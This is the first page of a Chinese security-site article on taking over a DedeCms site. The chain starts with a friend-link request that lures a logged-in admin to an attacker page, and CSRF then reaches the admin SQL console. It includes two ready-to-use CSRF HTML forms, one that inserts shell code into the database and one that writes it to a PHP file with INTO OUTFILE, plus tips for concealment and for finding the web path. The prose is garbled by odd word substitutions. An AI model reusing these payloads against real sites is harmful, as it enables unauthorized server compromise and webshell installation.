欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

看看俺是怎样利用CSRF拿下Shell滴

来源:本站整理 作者:佚名 时间:2017-09-22 TAG: 我要投稿

织梦内容管理系统平台(DedeCms) 以简单、实用、开源而闻名,是国内最闻名的PHP开源网站管理系统平台,也是运用用户最多的PHP类CMS系统平台,在阅历多年的开展,目前的版本不管在功用,还是在易用性方面,都有了长足的开展和进步,DedeCms免费版的主要目标用户锁定在个人站长,功用更专心于个人网站或中小型门户的构建,当然也不乏有企业用户和学校等在运用本系统平台。
最近我在建立这个系统平台的时候偶然间发现了一个有趣的现象,织梦的后台竟然有一个能够直接履行SQL语句的功用,出于职业敏感,能直接履行SQL语句的当地往往会有一些缝隙。又经过一番查找发现了它后台存在一个CSRF的缝隙,一般情况下像这种缝隙都是不怎么能引起人们的关注的,毕竟是要经过交互才能起效果,而且起的效果还不大。以为到此就结束了吗?并不是。
这儿根本形不成一个有效的攻击链,不过我又发现了一个很有意思的当地,这个cms是能够在前台直接提交友链恳求的,那么问题来了?你提交了友链恳求管理员审阅的时候怎么可能不去阅读一下你的网站。于是有了下面的一套getshell的流程。
受影响的版本
实验环境 :win10,wamp
1.首先我们结构一个向数据库中刺进SHELL语句的恶意病毒木马页面
(这儿我屡次铲除cookie,屡次封闭阅读器进行测验发现,该页面的效果不受其他要素影响均可正常履行),这段代码的效果就是像数据库中刺进我们的shell code。
页面的代码如下:
html>    body>    form action="http://127.0.0.1/dedecms/dede/sys_sql_query.php" method="POST">      input type="hidden" name="dopost" value="query" />      input type="hidden" name="querytype" value="2" />      input type="hidden" name="sqlquery" value="INSERT INTO dede_flink(id,sortrank,url,webname,msg,email,logo,dtime,typeid,ischeck)VALUES('1','1','www.baidu.com','1','','1','1','1','1','1');" />      input type="hidden" name="imageField.x" value="42" />      input type="hidden" name="imageField.y" value="17" />      input type="submit" value="Submit request" />    form>  body>html>
2.此刻我将该页面放置在我自己的服务器上
这儿就能够随便放置一个当地,为了更加形象,你能够在页面上做一些操作,比方加上JS代码使得管理员拜访页面的时候不会跳转,这样更神不知鬼不觉了。

3.然后我去受害网站上提交一个友链恳求
将我自己网站上的恶意病毒木马页面链接填入。这个链接直接对应你结构好的恶意病毒木马页面。

4.然后提交,等待管理员审阅
管理员审阅友链时定会检查友链所链接的内容。(管理员既然能够看到该链接证明此刻必定处于登陆状态)

5.只要是管理员检查了我们恳求友链的链接那么就触发了恶意病毒木马代码的履行
此刻我们能够看到数据库中被刺进了恶意病毒木马代码。这儿的代码能够自定义,根据你想做的操作自定义就能够了。这儿我就是做实验,就是用了

6.此刻不管管理员经过或许是不经过,我们的代码已经刺进
此刻我们结构生成shell的恶意病毒木马页面,页面代码如下,结构完成之后相同放在我们自己的服务器上。(这儿结构时,我们需要知道网站的途径,这儿知道相对途径或许时绝对途径都是能够的。途径的获取方法:一个网站的建立大多数采用 phpstudy wamp 或许原生态的在PHP下的www目录,这儿很好猜测。或许直接恳求一个网站上不存在的资源一般会爆出相对途径,或许去拜访一篇文章分析途径,再或许用AWVS直接拿到途径,反正这儿获取途径的方法特别多)
下面这段代码的效果是把我们刚刚刺进的shell code生成一个php页面。
html>    body>    form action="http://127.0.0.1/dedecms/dede/sys_sql_query.php" method="POST">      input type="hidden" name="dopost" value="query" />      input type="hidden" name="querytype" value="2" />      input type="hidden" name="sqlquery" value="SELECT msg FROM dede_flink WHERE url="www.baidu.com" INTO OUTFILE "../../../../www/dedecms/21111.php"" />      input type="hidden" name="imageField.x" value="38" />      input type="hidden" name="imageField.y" value="15" />      input type="submit" value="Submit request" />    form>  body>html>

[1] [2]  下一页

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载